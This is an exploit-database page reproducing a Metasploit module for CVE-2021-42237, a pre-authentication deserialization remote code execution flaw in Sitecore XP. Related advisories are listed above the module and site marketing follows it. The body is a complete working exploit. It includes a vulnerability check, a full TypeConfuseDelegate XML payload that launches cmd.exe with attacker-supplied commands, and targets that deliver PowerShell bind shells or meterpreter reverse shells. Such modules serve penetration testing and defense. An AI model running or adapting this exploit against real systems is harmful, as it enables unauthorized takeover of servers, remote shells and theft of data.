Vulners
Lucene search
Sitecore Experience Platform (XP) Remote Code Execution Exploit
| Reporter | Title | Published | Views | Family All 29 |
|---|---|---|---|---|
 | 2021 Top Routinely Exploited Vulnerabilities | 28 Apr 202212:00 | – | ics |
| Top CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors | 6 Oct 202212:00 | – | ics |
 | CVE-2021-42237 | 5 Nov 202100:00 | – | attackerkb |
 | Joint Advisory AA22-279A and Vulristics | 21 Oct 202220:10 | – | avleonov |
 | The vulnerability of the Sitecore XP content management system’s configuration allows a hacker to execute arbitrary code. | 4 Jan 202200:00 | – | bdu_fstec |
 | CVE-2021-42237 | 5 Nov 202113:25 | – | circl |
 | Sitecore XP Remote Command Execution Vulnerability | 25 Mar 202200:00 | – | cisa_kev |
 | Sitecore 代码问题漏洞 | 5 Nov 202100:00 | – | cnnvd |
 | Sitecore XP Remote Code Execution (CVE-2021-42237) | 6 Feb 202200:00 | – | checkpoint_advisories |
 | CVE-2021-42237 | 5 Nov 202109:51 | – | cve |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Sitecore Experience Platform (XP) PreAuth Deserialization RCE',
'Description' => %q{
This module exploits a deserialization vulnerability in the Report.ashx page
of Sitecore XP 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7.
Versions 7.2.6 and earlier and 9.0 and later are not affected.
The vulnerability occurs due to Report.ashx's handler, located in Sitecore.Xdb.Client.dll
under the Sitecore.sitecore.shell.ClientBin.Reporting.Report defintion, having a ProcessRequest()
handler that calls ProcessReport() with the context of the attacker's request without properly
checking if the attacker is authenticated or not.
This request then causes ReportDataSerializer.DeserializeQuery() to be called, which will
end up calling the DeserializeParameters() function of
Sitecore.Analytics.Reporting.ReportDataSerializer, if a "parameters" XML tag is found in
the attacker's request.
Then for each subelement named "parameter", the code will check that it has a name and
if it does, it will call NetDataContractSerializer().ReadObject on it. NetDataContractSerializer is
vulnerable to deserialization attacks and can be trivially exploited by using the
TypeConfuseDelegate gadget chain.
By exploiting this vulnerability, an attacker can gain arbitrary code execution as the user
that IIS is running as, aka NT AUTHORITY\NETWORK SERVICE. Users can then use technique 4
of the "getsystem" command to use RPCSS impersonation and get SYSTEM level code execution.
},
'Author' => [
'AssetNote', # Discovery and exploit
'gwillcox-r7' # Module
],
'References' => [
['CVE', '2021-42237'],
['URL', 'https://blog.assetnote.io/2021/11/02/sitecore-rce/'],
['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776'],
],
'DisclosureDate' => '2021-11-02',
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false, # Gains NT AUTHORITY\NETWORK SERVICE privileges. Possible to elevate to SYSTEM but this isn't done automatically.
'Targets' => [
[
'Windows Command',
{
'Arch' => ARCH_CMD,
'Type' => :win_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/powershell_bind_tcp'
}
}
],
[
'Windows Dropper',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :win_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
}
],
[
'PowerShell Stager',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_stager,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 1,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path of Sitecore', '/'])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sitecore', 'shell', 'ClientBin', 'Reporting', 'Report.ashx')
)
unless res
return CheckCode::Unknown('Target did not respond to check.')
end
unless res.code == 200 && res.body.include?('Sitecore.Analytics.Reporting.ReportDataSerializer.DeserializeQuery')
return CheckCode::Safe('Target is not running Sitecore XP or has patched the vulnerability.')
end
return CheckCode::Appears('Response.ashx is accessible and appears to be deserializing data!')
end
def xml_payload(cmd)
%|<parameters>
<parameter name="">
<ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"
xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
xmlns:x="http://www.w3.org/2001/XMLSchema"
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
<Count z:Id="2" z:Type="System.Int32" z:Assembly="0"
xmlns="">2</Count>
<Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"
xmlns="">
<_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"
xmlns:a="http://schemas.datacontract.org/2004/07/System">
<Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"
xmlns="">
<a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>
<a:delegateEntry z:Id="7">
<a:assembly z:Ref="6" i:nil="true"/>
<a:delegateEntry i:nil="true"/>
<a:methodName z:Id="8">Compare</a:methodName>
<a:target i:nil="true"/>
<a:targetTypeAssembly z:Ref="6" i:nil="true"/>
<a:targetTypeName z:Id="9">System.String</a:targetTypeName>
<a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
</a:delegateEntry>
<a:methodName z:Id="11">Start</a:methodName>
<a:target i:nil="true"/>
<a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>
<a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName>
<a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
</Delegate>
<method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
xmlns=""
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
<Name z:Ref="11" i:nil="true"/>
<AssemblyName z:Ref="12" i:nil="true"/>
<ClassName z:Ref="13" i:nil="true"/>
<Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
<Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
<MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
<GenericArguments i:nil="true"/>
</method0>
<method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
xmlns=""
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
<Name z:Ref="8" i:nil="true"/>
<AssemblyName z:Ref="6" i:nil="true"/>
<ClassName z:Ref="9" i:nil="true"/>
<Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
<Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
<MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
<GenericArguments i:nil="true"/>
</method1>
</_comparison>
</Comparer>
<Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
xmlns="">
<string z:Id="25"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c #{cmd.encode(xml: :text)}</string>
<string z:Id="26"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd.exe</string>
</Items>
</ArrayOfstring>
</parameter>
</parameters>|
end
def exploit
case target['Type']
when :win_cmd
print_status('Executing command payload')
execute_command(payload.encoded)
when :win_dropper
execute_cmdstager
when :psh_stager
execute_command(cmd_psh_payload(
payload.encoded,
payload.arch.first,
remove_comspec: true
))
end
end
def execute_command(cmd, _opts = {})
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'sitecore', 'shell', 'ClientBin', 'Reporting', 'Report.ashx'),
'ctype' => 'text/xml',
'data' => xml_payload(cmd)
)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Nov 2021 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 210
CVSS 3.19.8
EPSS0.94374